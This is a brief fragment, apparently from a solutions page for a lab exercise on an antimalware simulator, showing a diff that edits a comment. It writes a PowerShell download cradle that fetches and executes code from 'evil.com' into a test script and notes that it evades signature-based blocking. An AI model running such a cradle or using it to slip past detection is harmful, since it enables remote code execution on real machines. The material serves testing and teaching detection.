← All Solutions

 nim_antimalware_sim.exe test_sig.ps1

-# This will NOT be blocked (download cradle without signatures)
+# This will NOT be blocked (download cradle, no signature strings)

 Set-Content "test_cradle2.ps1" -Value '$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString("http://evil.com/x")'